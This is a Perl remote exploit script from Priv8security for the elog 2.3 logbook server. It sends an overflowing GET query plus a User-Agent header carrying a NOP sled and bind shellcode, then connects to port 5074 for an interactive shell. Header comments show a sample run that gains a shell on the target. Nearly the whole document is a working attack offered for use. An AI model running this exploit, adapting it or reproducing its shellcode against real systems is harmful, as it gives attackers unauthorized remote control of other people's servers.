#!/usr/bin/perl # Priv8security.com remote elog exploit!!! # # Based on advisory. # http://www.securityfocus.com/bid/6514 # # Tested only on elog 2.3 on Mandrake 9.0 and 9.1 # # [wsxz@localhost buffer]$ perl priv8elog.pl localhost # Connected! # [+] Using address: 0x809d180 # [+] Sending stuff... # [+] Done ;pPPp # [?] Now lets see if we got a shell... # [+] Enjoy your stay on this server =) # Linux localhost.localdomain 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686 unknown unknown GNU/Linux # uid=503(wsxz) gid=503(wsxz) groups=503(wsxz) # # Any questions??? wsxz@priv8security.com # or #priv8security @ EFNET use IO::Socket; if (@ARGV < 1 || @ARGV > 3) { print STDOUT "-= Priv8security.com elog 2.3 remote exploit =-\n"; print STDOUT "Usage: perl $0 \n"; exit; } if (@ARGV >= 2) { $port = $ARGV[1]; $offset = $ARGV[2]; } else { $port = 8080; $offset = 0; } $shellcode = #bind shellcode port 5074 by s0t4ipv6@shellcode.com.ar "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66". "\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1". "\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04". "\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66". "\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6". "\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53". "\x89\xe1\xb0\x0b\xcd\x80"; $return = 0x809d180; # User-Agent is on heap $egglen = 800; $new_ret = pack('l', ($return + $offset)); #pack the ret ;) $buffer = "A" x 281; $buffer .= $new_ret; for ($i = 0; $i < ($egglen - length($shellcode)); $i++) { $egg .= "\x90"; } $egg .= $shellcode; $exploit = "GET /demo/?$buffer HTTP/1.0 User-Agent: $egg\r\n\r\n"; $f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$ARGV[0],PeerPort=>$port) or die "Cant connect to server or port...\n"; print "Connected!\n"; print "[+] Using address: 0x", sprintf('%lx',($return)), "\n"; print "[+] Sending stuff...\n"; print $f "$exploit\r\n\r\n"; print "[+] Done ;pPPp\n"; print "[?] Now lets see if we got a shell...\n"; close($f); $handle = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$ARGV[0],PeerPort=>5074,Type=>SOCK_STREAM,Reuse=>1) or die " [-] No luck, try next time ok ...\n"; print "[+] Enjoy your stay on this server =)\n"; $handle->autoflush(1); print $handle "uname -a;id\n"; # split the program into two processes, identical twins die "cant fork: $!" unless defined($kidpid = fork()); # the if{} block runs only in the parent process if ($kidpid) { # copy the socket to standard output while (defined ($line = <$handle>)) { print STDOUT $line; } kill("TERM", $kidpid); # send SIGTERM to child } # the else{} block runs only in the child process else { # copy standard input to the socket while (defined ($line = )) { print $handle $line; } }